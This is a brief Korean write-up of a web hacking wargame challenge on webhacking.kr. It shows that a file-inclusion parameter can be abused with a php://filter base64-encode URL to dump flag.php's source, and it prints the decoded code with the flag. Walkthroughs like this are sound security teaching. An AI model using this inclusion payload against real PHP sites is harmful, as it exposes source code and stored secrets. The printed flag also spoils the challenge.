?file=hello로 접속하면 hello.php를 실행한 결과를 보여주는 것 같다. ?file=flag로 접속해보면,
플래그는 코드 안에 있다고 한다. PHP wrapper를 이용하여 flag.php 파일의 내용을 읽어올 수 있다.
http://webhacking.kr:10001/?file=php://filter/convert.base64-encode/resource=flag
base64로 디코딩하면 flag.php 파일의 내용을 볼 수 있고, 그 안에서 플래그를 획득할 수 있다.
<?php
echo "FLAG is in the code";
$flag = "FLAG{this_is_your_first_flag}";
?>728x90
